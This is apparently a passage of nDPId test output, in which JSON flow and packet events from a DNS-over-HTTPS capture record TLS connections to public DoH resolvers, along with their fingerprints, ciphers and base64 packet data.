7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCVwHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R0